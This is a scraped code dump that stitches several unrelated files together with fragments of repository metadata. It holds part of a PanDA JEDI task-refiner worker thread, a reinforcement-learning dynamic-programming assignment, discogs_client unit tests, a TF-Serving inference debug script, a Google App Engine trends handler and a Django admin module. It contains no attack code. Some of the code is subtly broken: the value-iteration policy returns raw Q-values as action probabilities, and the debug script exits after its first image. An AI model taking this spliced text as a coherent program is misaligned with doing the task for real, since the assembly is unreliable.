                errtype, errvalue = sys.exc_info()[:2]
                tmpLog.error(f"failed in {self.__class__.__name__}.start() with {errtype.__name__} {errvalue}")
                tmpLog.error(f"Traceback: {traceback.format_exc()}")
            # sleep if needed so one cycle takes at least loopCycle seconds
            loopCycle = jedi_config.taskrefine.loopCycle
            timeDelta = datetime.datetime.utcnow() - startTime
            sleepPeriod = loopCycle - timeDelta.seconds
            if sleepPeriod > 0:
                time.sleep(sleepPeriod)
            # randomize cycle
            self.randomSleep(max_val=loopCycle)
# thread for real worker
class TaskRefinerThread(WorkerThread):
    """Worker thread: pops tasks from a shared locked list and refines each one.

    Refinement = read the TASK_PARAM JSON, pick a VO/label/type-specific
    refiner implementation, extract common parameters, verify the parent
    task, run doRefine(), and finally register or update the task in JEDI.
    """

    # constructor
    def __init__(self, taskList, threadPool, taskbufferIF, ddmIF, implFactory, workQueueMapper):
        # initialize worker with no semaphore
        WorkerThread.__init__(self, None, threadPool, logger)
        # attributes
        self.taskList = taskList
        self.taskBufferIF = taskbufferIF
        self.ddmIF = ddmIF
        self.implFactory = implFactory
        self.workQueueMapper = workQueueMapper
        self.msgType = "taskrefiner"

    # main
    def runImpl(self):
        """Pop up to 10 tasks at a time and run the full refinement sequence on each."""
        while True:
            try:
                # get a part of list
                nTasks = 10
                taskList = self.taskList.get(nTasks)
                # no more datasets
                if len(taskList) == 0:
                    self.logger.info(f"{self.__class__.__name__} terminating since no more items")
                    return
                # loop over all tasks
                for jediTaskID, splitRule, taskStatus, parent_tid in taskList:
                    # make logger
                    tmpLog = MsgWrapper(self.logger, f"< jediTaskID={jediTaskID} >")
                    tmpLog.debug("start")
                    tmpStat = Interaction.SC_SUCCEEDED
                    errStr = ""
                    # read task parameters
                    try:
                        taskParam = None
                        taskParam = self.taskBufferIF.getTaskParamsWithID_JEDI(jediTaskID)
                        taskParamMap = RefinerUtils.decodeJSON(taskParam)
                    except Exception:
                        errtype, errvalue = sys.exc_info()[:2]
                        errStr = f"conversion to map from json failed with {errtype.__name__}:{errvalue}"
                        tmpLog.debug(taskParam)
                        tmpLog.error(errStr)
                        continue
                        # NOTE(review): unreachable — the ``continue`` above skips this line
                        tmpStat = Interaction.SC_FAILED
                    # get impl
                    if tmpStat == Interaction.SC_SUCCEEDED:
                        tmpLog.info("getting Impl")
                        try:
                            # get VO and sourceLabel
                            vo = taskParamMap["vo"]
                            prodSourceLabel = taskParamMap["prodSourceLabel"]
                            taskType = taskParamMap["taskType"]
                            tmpLog.info(f"vo={vo} sourceLabel={prodSourceLabel} taskType={taskType}")
                            # get impl
                            impl = self.implFactory.instantiateImpl(vo, prodSourceLabel, taskType, self.taskBufferIF, self.ddmIF)
                            if impl is None:
                                # task refiner is undefined
                                errStr = f"task refiner is undefined for vo={vo} sourceLabel={prodSourceLabel}"
                                tmpLog.error(errStr)
                                tmpStat = Interaction.SC_FAILED
                        except Exception:
                            errtype, errvalue = sys.exc_info()[:2]
                            errStr = f"failed to get task refiner with {errtype.__name__}:{errvalue}"
                            tmpLog.error(errStr)
                            tmpStat = Interaction.SC_FAILED
                    # extract common parameters
                    if tmpStat == Interaction.SC_SUCCEEDED:
                        tmpLog.info("extracting common")
                        try:
                            # initalize impl
                            impl.initializeRefiner(tmpLog)
                            impl.oldTaskStatus = taskStatus
                            # extract common parameters
                            impl.extractCommon(jediTaskID, taskParamMap, self.workQueueMapper, splitRule)
                            # set parent tid
                            if parent_tid not in [None, jediTaskID]:
                                impl.taskSpec.parent_tid = parent_tid
                        except Exception:
                            errtype, errvalue = sys.exc_info()[:2]
                            # on hold in case of external error
                            if errtype == JediException.ExternalTempError:
                                tmpErrStr = f"pending due to external problem. {errvalue}"
                                setFrozenTime = True
                                impl.taskSpec.status = taskStatus
                                impl.taskSpec.setOnHold()
                                impl.taskSpec.setErrDiag(tmpErrStr)
                                # not to update some task attributes
                                impl.taskSpec.resetRefinedAttrs()
                                tmpLog.info(tmpErrStr)
                                self.taskBufferIF.updateTask_JEDI(
                                    impl.taskSpec,
                                    {"jediTaskID": impl.taskSpec.jediTaskID},
                                    oldStatus=[taskStatus],
                                    insertUnknown=impl.unknownDatasetList,
                                    setFrozenTime=setFrozenTime,
                                )
                                continue
                            errStr = f"failed to extract common parameters with {errtype.__name__}:{errvalue} {traceback.format_exc()}"
                            tmpLog.error(errStr)
                            tmpStat = Interaction.SC_FAILED
                    # check attribute length
                    if tmpStat == Interaction.SC_SUCCEEDED:
                        tmpLog.info("checking attribute length")
                        if not impl.taskSpec.checkAttrLength():
                            tmpLog.error(impl.taskSpec.errorDialog)
                            tmpStat = Interaction.SC_FAILED
                    # staging: park the task until staging finishes
                    if tmpStat == Interaction.SC_SUCCEEDED:
                        if "toStaging" in taskParamMap and taskStatus not in ["staged", "rerefine"]:
                            errStr = "wait until staging is done"
                            impl.taskSpec.status = "staging"
                            impl.taskSpec.oldStatus = taskStatus
                            impl.taskSpec.setErrDiag(errStr)
                            # not to update some task attributes
                            impl.taskSpec.resetRefinedAttrs()
                            tmpLog.info(errStr)
                            self.taskBufferIF.updateTask_JEDI(
                                impl.taskSpec, {"jediTaskID": impl.taskSpec.jediTaskID}, oldStatus=[taskStatus], updateDEFT=False, setFrozenTime=False
                            )
                            continue
                    # check parent
                    noWaitParent = False
                    parentState = None
                    if tmpStat == Interaction.SC_SUCCEEDED:
                        if parent_tid not in [None, jediTaskID]:
                            tmpLog.info("check parent task")
                            try:
                                tmpStat = self.taskBufferIF.checkParentTask_JEDI(parent_tid)
                                parentState = tmpStat
                                if tmpStat == "completed":
                                    # parent is done
                                    tmpStat = Interaction.SC_SUCCEEDED
                                elif tmpStat is None or tmpStat == "running":
                                    if not impl.taskSpec.noWaitParent():
                                        # parent is running
                                        errStr = f"pending until parent task {parent_tid} is done"
                                        impl.taskSpec.status = taskStatus
                                        impl.taskSpec.setOnHold()
                                        impl.taskSpec.setErrDiag(errStr)
                                        # not to update some task attributes
                                        impl.taskSpec.resetRefinedAttrs()
                                        tmpLog.info(errStr)
                                        self.taskBufferIF.updateTask_JEDI(
                                            impl.taskSpec, {"jediTaskID": impl.taskSpec.jediTaskID}, oldStatus=[taskStatus], setFrozenTime=False
                                        )
                                        continue
                                    else:
                                        # not wait for parent
                                        tmpStat = Interaction.SC_SUCCEEDED
                                        noWaitParent = True
                                else:
                                    # parent is corrupted
                                    tmpStat = Interaction.SC_FAILED
                                    tmpErrStr = f"parent task {parent_tid} failed to complete"
                                    impl.taskSpec.setErrDiag(tmpErrStr)
                            except Exception:
                                errtype, errvalue = sys.exc_info()[:2]
                                errStr = f"failed to check parent task with {errtype.__name__}:{errvalue}"
                                tmpLog.error(errStr)
                                tmpStat = Interaction.SC_FAILED
                    # refine
                    if tmpStat == Interaction.SC_SUCCEEDED:
                        tmpLog.info(f"refining with {impl.__class__.__name__}")
                        try:
                            tmpStat = impl.doRefine(jediTaskID, taskParamMap)
                        except Exception:
                            errtype, errvalue = sys.exc_info()[:2]
                            # wait unknown input if noWaitParent or waitInput
                            toFinish = False
                            if (
                                ((impl.taskSpec.noWaitParent() or impl.taskSpec.waitInput()) and errtype == JediException.UnknownDatasetError)
                                or parentState == "running"
                                or errtype == Interaction.JEDITemporaryError
                            ):
                                if impl.taskSpec.noWaitParent() and errtype == JediException.UnknownDatasetError and parentState != "running":
                                    if impl.taskSpec.allowEmptyInput():
                                        tmpErrStr = f"finishing due to missing input while parent is {parentState}"
                                        toFinish = True
                                        setFrozenTime = False
                                    else:
                                        tmpErrStr = f"pending due to missing input while parent is {parentState}"
                                        setFrozenTime = True
                                elif impl.taskSpec.noWaitParent() or parentState == "running":
                                    tmpErrStr = f"pending until parent produces input. parent is {parentState}"
                                    setFrozenTime = False
                                elif errtype == Interaction.JEDITemporaryError:
                                    tmpErrStr = f"pending due to DDM problem. {errvalue}"
                                    setFrozenTime = True
                                else:
                                    tmpErrStr = "pending until input is staged"
                                    setFrozenTime = True
                                if toFinish:
                                    impl.taskSpec.status = "finishing"
                                else:
                                    impl.taskSpec.status = taskStatus
                                    impl.taskSpec.setOnHold()
                                impl.taskSpec.setErrDiag(tmpErrStr)
                                # not to update some task attributes
                                impl.taskSpec.resetRefinedAttrs()
                                tmpLog.info(tmpErrStr)
                                self.taskBufferIF.updateTask_JEDI(
                                    impl.taskSpec,
                                    {"jediTaskID": impl.taskSpec.jediTaskID},
                                    oldStatus=[taskStatus],
                                    insertUnknown=impl.unknownDatasetList,
                                    setFrozenTime=setFrozenTime,
                                )
                                continue
                            elif (
                                not (impl.taskSpec.noWaitParent() or impl.taskSpec.waitInput())
                                and errtype == JediException.UnknownDatasetError
                                and impl.taskSpec.allowEmptyInput()
                            ):
                                impl.taskSpec.status = "finishing"
                                tmpErrStr = f"finishing due to missing input after parent is {parentState}"
                                impl.taskSpec.setErrDiag(tmpErrStr)
                                # not to update some task attributes
                                impl.taskSpec.resetRefinedAttrs()
                                tmpLog.info(tmpErrStr)
                                self.taskBufferIF.updateTask_JEDI(
                                    impl.taskSpec, {"jediTaskID": impl.taskSpec.jediTaskID}, oldStatus=[taskStatus], insertUnknown=impl.unknownDatasetList
                                )
                                continue
                            else:
                                errStr = f"failed to refine task with {errtype.__name__}:{errvalue}"
                                tmpLog.error(errStr)
                                tmpStat = Interaction.SC_FAILED
                    # register
                    if tmpStat != Interaction.SC_SUCCEEDED:
                        tmpLog.error("failed to refine the task")
                        if impl is None or impl.taskSpec is None:
                            tmpTaskSpec = JediTaskSpec()
                            tmpTaskSpec.jediTaskID = jediTaskID
                        else:
                            tmpTaskSpec = impl.taskSpec
                        tmpTaskSpec.status = "tobroken"
                        if errStr != "":
                            tmpTaskSpec.setErrDiag(errStr, True)
                        self.taskBufferIF.updateTask_JEDI(tmpTaskSpec, {"jediTaskID": tmpTaskSpec.jediTaskID}, oldStatus=[taskStatus])
                    else:
                        tmpLog.info("registering")
                        # fill JEDI tables
                        try:
                            # enable protection against task duplication
                            if "uniqueTaskName" in taskParamMap and taskParamMap["uniqueTaskName"] and not impl.taskSpec.checkPreProcessed():
                                uniqueTaskName = True
                            else:
                                uniqueTaskName = False
                            strTaskParams = None
                            if impl.updatedTaskParams is not None:
                                strTaskParams = RefinerUtils.encodeJSON(impl.updatedTaskParams)
                            if taskStatus in ["registered", "staged"]:
                                # unset pre-process flag
                                if impl.taskSpec.checkPreProcessed():
                                    impl.taskSpec.setPostPreProcess()
                                # full registration
                                tmpStat, newTaskStatus = self.taskBufferIF.registerTaskInOneShot_JEDI(
                                    jediTaskID,
                                    impl.taskSpec,
                                    impl.inMasterDatasetSpec,
                                    impl.inSecDatasetSpecList,
                                    impl.outDatasetSpecList,
                                    impl.outputTemplateMap,
                                    impl.jobParamsTemplate,
                                    strTaskParams,
                                    impl.unmergeMasterDatasetSpec,
                                    impl.unmergeDatasetSpecMap,
                                    uniqueTaskName,
                                    taskStatus,
                                )
                                if not tmpStat:
                                    tmpErrStr = "failed to register the task to JEDI in a single shot"
                                    tmpLog.error(tmpErrStr)
                                    tmpTaskSpec = JediTaskSpec()
                                    tmpTaskSpec.status = newTaskStatus
                                    tmpTaskSpec.errorDialog = impl.taskSpec.errorDialog
                                    tmpTaskSpec.setErrDiag(tmpErrStr, True)
                                    self.taskBufferIF.updateTask_JEDI(tmpTaskSpec, {"jediTaskID": impl.taskSpec.jediTaskID}, oldStatus=[taskStatus])
                                tmpMsg = f"set task_status={newTaskStatus}"
                                tmpLog.info(tmpMsg)
                                tmpLog.sendMsg(tmpMsg, self.msgType)
                                # send message to contents feeder if the task is registered
                                if tmpStat and impl.taskSpec.is_msg_driven():
                                    push_ret = self.taskBufferIF.push_task_trigger_message("jedi_contents_feeder", jediTaskID)
                                    if push_ret:
                                        tmpLog.debug("pushed trigger message to jedi_contents_feeder")
                                    else:
                                        tmpLog.warning("failed to push trigger message to jedi_contents_feeder")
                            else:
                                # disable scouts if previous attempt didn't use it
                                if not impl.taskSpec.useScout(splitRule):
                                    impl.taskSpec.setUseScout(False)
                                # disallow to reset some attributes
                                impl.taskSpec.reserve_old_attributes()
                                # update task with new params
                                self.taskBufferIF.updateTask_JEDI(impl.taskSpec, {"jediTaskID": impl.taskSpec.jediTaskID}, oldStatus=[taskStatus])
                                # appending for incremental execution
                                tmpStat = self.taskBufferIF.appendDatasets_JEDI(jediTaskID, impl.inMasterDatasetSpec, impl.inSecDatasetSpecList)
                                if not tmpStat:
                                    tmpLog.error("failed to append datasets for incexec")
                        except Exception:
                            errtype, errvalue = sys.exc_info()[:2]
                            tmpErrStr = f"failed to register the task to JEDI with {errtype.__name__}:{errvalue}"
                            tmpLog.error(tmpErrStr)
                        else:
                            tmpLog.info("done")
            except Exception:
                errtype, errvalue = sys.exc_info()[:2]
                logger.error(f"{self.__class__.__name__} failed in runImpl() with {errtype.__name__}:{errvalue}")
# lauch
def launcher(commuChannel, taskBufferIF, ddmIF, vos=None, prodSourceLabels=None):
    """Instantiate a TaskRefiner agent and enter its main loop."""
    refiner = TaskRefiner(commuChannel, taskBufferIF, ddmIF, vos, prodSourceLabels)
    refiner.start()
| PanDAWMS/panda-jedi | pandajedi/jediorder/TaskRefiner.py | TaskRefiner.py | py | 23,185 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "pandacommon.pandalogger.PandaLogger.PandaLogger",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "JediKnight.JediKnight",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "pandajedi.jedicore.FactoryBase.FactoryBase",
"line_number": 23,
"us... |
16077958011 | from typing import Tuple
import numpy as np
from env import EnvWithModel
from policy import Policy
def value_prediction(env: EnvWithModel, pi: Policy, initV: np.array, theta: float) -> Tuple[np.array, np.array]:
    """
    inp:
        env: environment with model information, i.e. you know transition dynamics and reward function
        pi: policy
        initV: initial V(s); numpy array shape of [nS,]
        theta: exit criteria
    return:
        V: $v_\pi$ function; numpy array shape of [nS]
        Q: $q_\pi$ function; numpy array shape of [nS,nA]
    """
    #####################
    # Iterative policy evaluation (Sutton & Barto, p.75)
    #####################
    # Cache pi(a|s) in a [nA, nS] matrix so the policy is queried once per (s, a).
    action_prob_mat = np.array([[pi.action_prob(s, a) for s in range(env.spec.nS)] for a in range(env.spec.nA)])

    # Init optimization variables
    V = initV.copy()

    # Sweep all states until the largest single-state update is below theta
    while True:
        Delta = 0  # maximal update error
        for s in range(env.spec.nS):
            v = V[s]
            pi_vec = action_prob_mat[:, s]  # pi(a|s) for all actions a
            p_mat = env.TD[s, :, :]  # transition probabilities p(s'|s,a)
            r_mat = env.R[s, :, :]  # rewards r(s,a,s')
            # Bellman expectation backup:
            # V(s) = sum_a pi(a|s) sum_{s'} p(s'|s,a) * (r + gamma * V(s'))
            return_mat = pi_vec[:, np.newaxis] * p_mat * (r_mat + env.spec.gamma * V[np.newaxis, :])
            V[s] = return_mat.sum()
            Delta = max(Delta, np.abs(V[s] - v))
        if Delta < theta:
            break

    # Derive Q from V: Q(s,a) = sum_{s'} p(s'|s,a) * (r + gamma * V(s'))
    Q = (env.TD * (env.R + env.spec.gamma * V[np.newaxis, np.newaxis, :])).sum(axis=-1)

    return V, Q
def value_iteration(env: EnvWithModel, initV: np.array, theta: float) -> Tuple[np.array, Policy]:
    """
    inp:
        env: environment with model information, i.e. you know transition dynamics and reward function
        initV: initial V(s); numpy array shape of [nS,]
        theta: exit criteria
    return:
        value: optimal value function; numpy array shape of [nS]
        policy: optimal deterministic policy; instance of Policy class
    """
    #####################
    # Value Iteration (Sutton & Barto, p.83)
    #####################
    # Init optimization variables
    V = initV.copy()

    # Sweep all states, backing up with the max over actions, until convergence
    while True:
        Delta = 0  # maximal update error
        for s in range(env.spec.nS):
            v = V[s]
            p_mat = env.TD[s, :, :]  # transition probabilities p(s'|s,a)
            r_mat = env.R[s, :, :]  # rewards r(s,a,s')
            # Bellman optimality backup: V(s) = max_a sum_{s'} p * (r + gamma * V(s'))
            return_mat = (p_mat * (r_mat + env.spec.gamma * V[np.newaxis, :])).sum(axis=1).max()
            V[s] = return_mat.sum()
            Delta = max(Delta, np.abs(V[s] - v))
        if Delta < theta:
            break

    # Compute the greedy (optimal) policy implied by the converged value estimate
    class MyPolicy(Policy):
        def __init__(self, pi_mat):
            # pi_mat[s, a] holds the action values Q*(s, a); the greedy action
            # is recovered via argmax in action()
            self.pi_mat = pi_mat

        def action_prob(self, state: int, action: int) -> float:
            return self.pi_mat[state, action]

        def action(self, state: int) -> int:
            return self.pi_mat[state, :].argmax()

    pi_mat = (env.TD * (env.R + env.spec.gamma * V[np.newaxis, np.newaxis, :])).sum(axis=2)
    pi = MyPolicy(pi_mat)

    return V, pi
| owen8877/Sp22-CS394R | prog2/dp.py | dp.py | py | 3,187 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "env.EnvWithModel",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "policy.Policy",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "numpy.array",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "numpy.array",
"line_... |
25820215342 | from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
from discogs_client import Client
from discogs_client.tests import DiscogsClientTestCase
from discogs_client.exceptions import ConfigurationError, HTTPError
from datetime import datetime
class CoreTestCase(DiscogsClientTestCase):
    """Core client behaviour: user agent, caching, equality, field access,
    and pagination, all exercised against the canned fixture fetcher
    provided by DiscogsClientTestCase (self.d is the fixture-backed client)."""

    def test_user_agent(self):
        """User-Agent should be properly set"""
        self.d.artist(1).name
        # A client constructed with an empty user agent must refuse to fetch.
        bad_client = Client('')
        self.assertRaises(ConfigurationError, lambda: bad_client.artist(1).name)
        try:
            bad_client.artist(1).name
        except ConfigurationError as e:
            # The error message should point at the missing User-Agent.
            self.assertTrue('User-Agent' in str(e))
    def test_caching(self):
        """Only perform a fetch when requesting missing data"""
        a = self.d.artist(1)
        # The id is known locally, so no HTTP request happens yet.
        self.assertEqual(a.id, 1)
        self.assertTrue(self.d._fetcher.last_request is None)
        # Accessing a lazy field triggers exactly one fetch.
        self.assertEqual(a.name, 'Persuader, The')
        self.assertGot('/artists/1')
        self.assertEqual(a.real_name, 'Jesper Dahlb\u00e4ck')
        self.assertEqual(len(self.d._fetcher.requests), 1)
        # Get a key that's not in our cache
        a.fetch('blorf')
        self.assertEqual(len(self.d._fetcher.requests), 2)
        self.assertTrue('blorf' in a._known_invalid_keys)
        # Now we know artists don't have blorves
        a.fetch('blorf')
        self.assertEqual(len(self.d._fetcher.requests), 2)
    def test_equality(self):
        """APIObjects of the same class are equal if their IDs are"""
        a1 = self.d.artist(1)
        a1_ = self.d.artist(1)
        self.d.artist(2)
        r1 = self.d.release(1)
        self.assertEqual(a1, a1_)
        self.assertEqual(a1, r1.artists[0])
        # Same id but different classes must not compare equal.
        self.assertNotEqual(a1, r1)
        self.assertNotEqual(r1, ':D')
    def test_transform_datetime(self):
        """String timestamps are converted to datetimes"""
        registered = self.d.user('example').registered
        self.assertTrue(isinstance(registered, datetime))
    def test_object_field(self):
        """APIObjects can have APIObjects as properties"""
        self.assertEqual(self.d.master(4242).main_release, self.d.release(79))
    def test_read_only_simple_field(self):
        """Can't write to a SimpleField when writable=False"""
        u = self.d.user('example')
        def fail():
            u.rank = 9001
        self.assertRaises(AttributeError, fail)
    def test_read_only_object_field(self):
        """Can't write to an ObjectField"""
        m = self.d.master(4242)
        def fail():
            m.main_release = 'lol!'
        self.assertRaises(AttributeError, fail)
    def test_pagination(self):
        """PaginatedLists are parsed correctly, indexable, and iterable"""
        results = self.d.artist(1).releases
        self.assertEqual(results.per_page, 50)
        self.assertEqual(results.pages, 2)
        self.assertEqual(results.count, 57)
        self.assertEqual(len(results), 57)
        self.assertEqual(len(results.page(1)), 50)
        # Requesting a page past the end surfaces the server's 404.
        self.assertRaises(HTTPError, lambda: results.page(42))
        try:
            results.page(42)
        except HTTPError as e:
            self.assertEqual(e.status_code, 404)
        self.assertRaises(IndexError, lambda: results[3141592])
        self.assertEqual(results[0].id, 20209)
        self.assertTrue(self.d.release(20209) in results)
        # Changing pagination settings invalidates the cache
        results.per_page = 10
        self.assertTrue(results._num_pages is None)
def suite():
    """Build the unittest suite containing all CoreTestCase tests."""
    # Bug fix: the original first assigned an empty TestSuite() and then
    # immediately overwrote it — the loader already returns a TestSuite,
    # so the extra object was dead code.
    return unittest.TestLoader().loadTestsFromTestCase(CoreTestCase)
if __name__ == '__main__':
    # Run the module's suite() factory when executed directly.
    unittest.main(defaultTest='suite')
| discogs/discogs_client | discogs_client/tests/test_core.py | test_core.py | py | 3,753 | python | en | code | 481 | github-code | 1 | [
{
"api_name": "discogs_client.tests.DiscogsClientTestCase",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "discogs_client.Client",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "discogs_client.exceptions.ConfigurationError",
"line_number": 17,
"usage... |
4496359468 | import requests
import numpy as np
import cv2
import sys, os, shutil
import json
sys.path.append("../")
from PIL import Image
# Debug script: posts each image in a folder to a TF-Serving YOLO-style
# detection endpoint, draws the returned boxes, and saves annotated copies.
# input_img = r"E:\data\starin-diode\diode-0605\images\20200605_5.jpg"
# input_img = "diode.jpg"
input_imgs = r"E:\data\diode-opt\imgs/"
# input_imgs = r"E:\pycharm_project\Data-proessing\break-group-yolo\test01\result/"
files = os.listdir(input_imgs)
save_path = r"out_imgs"
# Recreate the output directory from scratch on every run.
if os.path.exists(save_path):
    shutil.rmtree(save_path)
os.makedirs(save_path)
for file in files:
    # input_img = r"E:\data\diode-opt\imgs\20200611_84.jpg"
    input_img = input_imgs + file
    img = Image.open(input_img)
    print(np.array(img))
    # Resize to the model's expected input resolution.
    img1 = img.resize((416, 416))
    # img1 = img.resize((224, 224))
    image_np = np.array(img1)
    print(image_np.shape)
    # HWC -> CHW, then add a batch axis for the serving request.
    image_np = image_np.transpose([2,0,1])
    print(image_np.shape)
    # print(image_np[np.newaxis,:].shape)
    img_data = image_np[np.newaxis, :].tolist()
    print(image_np[np.newaxis,:].shape)
    data = {"instances": img_data}
    # data = {"inputs": img_data}
    # data = {"data": img_data}
    # http://172.20.112.102:8701/v1/models/model-fish/metadata
    preds1 = requests.post("http://172.20.112.102:9101/v1/models/model-diode:predict", json=data)
    # preds1 = requests.post("http://172.20.112.102:4000/predictions/resnet34", json=data)
    print(preds1.json())
    predictions1 = json.loads(preds1.content.decode('utf-8'))
    print(predictions1)
    # NOTE(review): exit() here terminates the whole script on the first
    # image — everything below in this loop body is currently dead code,
    # presumably left from an earlier debugging session.  Confirm before
    # removing either the exit() or the code below it.
    exit()
    preds = requests.post("http://172.20.112.102:9101/v1/models/model-diode:predict", json=data)
    print(preds)
    predictions = json.loads(preds.content.decode('utf-8'))["predictions"][0]
    print(predictions)
    print(np.array(predictions)[:,4].max())
    pred = np.array(predictions)
    print(pred.shape)
    # exit()
    # Keep detections whose objectness score exceeds the threshold.
    a = pred[:, 4] > 0.25
    print(pred[a])
    print(len(pred[a]))
    # exit()
    im = cv2.imread(input_img)
    # print(im.shape) # hwc
    # Scale factors from network resolution back to the original image.
    h_s = im.shape[0] / 416
    w_s = im.shape[1] / 416
    box = []
    for i in range(len(pred[a])):
        # print(pred[a][i])
        # Predictions are (cx, cy, w, h, score, class...); convert the
        # center/size form to corner coordinates.
        x1 = pred[a][i][0]
        y1 = pred[a][i][1]
        x2 = pred[a][i][2]
        y2 = pred[a][i][3]
        xx1 = (x1 - x2 / 2)
        yy1 = (y1 - y2 / 2)
        xx2 = (x1 + x2 / 2)
        yy2 = (y1 + y2 / 2)
        box.append([xx1, yy1, xx2, yy2, pred[a][i][4], pred[a][i][5:]])
        cv2.rectangle(im, (int(xx1 * w_s), int(yy1 * h_s)), (int(xx2 * w_s), int(yy2 * h_s)), (255, 0, 0))
    # print(box)
    # cv2.imshow('ss1', im)
    cv2.imwrite(save_path + '/' + file, im)
    # cv2.waitKey(0)
# filtered_boxes = np.array([[6.64219894e+01,3.38672394e+02,1.29818487e+01,1.43017712e+01]])
# draw_boxes(filtered_boxes, img, "classes", (416, 416), True)
# img.show()
# im = cv2.imread(input_img)
# # print(im.shape) # hwc
# x_ = im.shape[0]/416
# y_ = im.shape[1]/416
# # a = min(x_,y_)
# # p = 0.5*(im.shape[:2] - a*np.array([416,416]))
# # s = (np.array([66,338])-p)/a
# # print(s)
# # s1 = (np.array([12,14])-p)/a
# # print(s1)
# # w,h,cx,cy
# img = cv2.resize(im,(416,416))
# # cv2.rectangle(img,(79,182),(9,15),(0,0,255))
# # cv2.rectangle(img,(int((79-9/2)),int((182-15/2))),(int((79+9/2)),int((182+15/2))),(0,0,255))
# # cv2.rectangle(im,(int((338/2-12)*y_),int((66/2-14)*x_)),(int((12+338/2)*y_),int((14+66/2)*x_)),(0,0,255))
# h_s = im.shape[0]/416
# w_s = im.shape[1]/416
# x1 = 79
# y1 = 182
# x2 = 9
# y2 = 15
# xx1 = (x1 - x2/2)
# yy1 = (y1 - y2/2)
# xx2 = (x1 + x2/2)
# yy2 = (y1 + y2/2)
# cv2.rectangle(img,(xx1,yy1),(xx2,yy2),(0,0,255))
# cv2.rectangle(im,(int(xx1*w_s),int(yy1*h_s)),(int(xx2*w_s),int(yy2*h_s)),(255,0,0))
# x1,y1,x2,y2 x1- x2/2 y1- y2/2 x1+x2/2 y1 + y2/2
# cv2.imshow("ss",img)
# cv2.imshow('ss1',im)
# cv2.waitKey(0)
| Chase2816/TF-TORCH | tf1.15v3/tfserving-test1.py | tfserving-test1.py | py | 3,851 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_num... |
35939556874 | '''
Created on Nov 28, 2012
@author: cosmin
'''
from google.appengine.ext import webapp
import logging
import jinja2
import os
from models import Trend
from models import TopJobs
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
class SplitTrend:
    """Pairs a job name with its per-month counts parsed as integers."""

    def __init__(self, job, values):
        self.job = job
        logging.info(values)
        # Counts arrive as strings (split from "n;n;n;..."); store as ints.
        self.values = list(map(int, values))
class Trends(webapp.RequestHandler):
    """GAE request handler that renders job-trend percentages per month."""

    def get(self):
        '''
        The class serving the page for the trends.
        '''
        # Hard-coded month labels, newest-first, then reversed to
        # chronological order for display.
        months = ["2012-11", "2012-10", "2012-09", "2012-08", "2012-07",
                  "2012-06", "2012-05", "2012-04", "2012-03", "2012-02", "2012-01",
                  "2011-12", "2011-11", "2011-10", "2011-09", "2011-08", "2011-07",
                  "2011-06", "2011-05", "2011-04", "2011-03", "2011-02", "2011-01",
                  "2010-12", "2010-11", "2010-10", "2010-09", "2010-08", "2010-07",
                  "2010-06", "2010-05", "2010-04", "2010-03", "2010-02", "2010-01",
                  "2009-12", "2009-11", "2009-10", "2009-09", "2009-08", "2009-07",
                  "2009-06", "2009-05", "2009-04", "2009-03", "2009-02", "2009-01",
                  "2008-12", "2008-11", "2008-10", "2008-09", "2008-08", "2008-07",
                  "2008-06", "2008-05", "2008-04", "2008-03", "2008-02", "2008-01"]
        months.reverse()
        # Get jobs for trends (drop empty query params)
        jobs = self.request.get_all("job")
        jobs = [j for j in jobs if len(j) > 0]
        logging.info("Trends for jobs: " + ','.join(jobs))
        # Also get the total counts for months
        jobs.append('total')
        # Get the trends from the database
        split_trends = []
        if len(jobs) > 1:
            trends = Trend.all()
            trends.filter("job IN", jobs)
            for t in trends:
                nt = SplitTrend(t.job, t.monthly_count.split(';'))
                if nt.job == 'total':
                    total = nt
                    logging.info("Total - " + str(t))
                else:
                    split_trends.append(nt)
                    logging.info(t)
            trends_names = [t.job for t in split_trends]
            # Compute percentages of each job count relative to the month total.
            # NOTE(review): this raises NameError if no 'total' trend row
            # exists, and ZeroDivisionError if a month's total is 0 — confirm
            # the datastore always contains a non-zero 'total' entry.
            for t in split_trends:
                t.values = [val * 100.0 / total.values[idx] for idx, val in enumerate(t.values)]
        # Generate the page
        # NOTE(review): when no jobs were selected, trends_names is never
        # assigned and this line raises NameError — verify against callers.
        template_values = { 'jobs': TopJobs, 'trends': split_trends, 'trends_names': trends_names, 'count': len(split_trends), 'months': months}
        template = jinja_environment.get_template('templates/trends.html')
        self.response.out.write(template.render(template_values))
| cosminstefanxp/freely-stats | remote-code/Trends.py | Trends.py | py | 2,653 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "jinja2.Environment",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "jinja2.FileSystemLoader",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path",
... |
29653268879 | from django.contrib import admin as dj_admin
from django.contrib import admin
from myapp.models import Project, ModelGroup, AutodeskExtractorRule, BimModel, Job
from myapp.models import URN, ActiveLink
class WorkAdmin(admin.ModelAdmin):
    """Admin listing showing id and name columns.

    Consistency fix: use the `admin` alias like every other ModelAdmin in
    this module — `dj_admin` and `admin` name the same
    django.contrib.admin module.
    """
    list_display = ("id", "name")
class ProjectAdmin(admin.ModelAdmin):
    """Admin columns for Project, including audit (created/updated/deleted) fields."""
    list_display = (
        "name",
        "description",
        "created_at",
        "updated_at",
        "created_by",
        "updated_by",
        "deleted_at",
        "deleted_by",
    )
class ModelGroupAdmin(admin.ModelAdmin):
    """Admin columns for ModelGroup; mirrors ProjectAdmin's audit columns."""
    list_display = (
        "name",
        "description",
        "created_at",
        "updated_at",
        "created_by",
        "updated_by",
        "deleted_at",
        "deleted_by",
    )
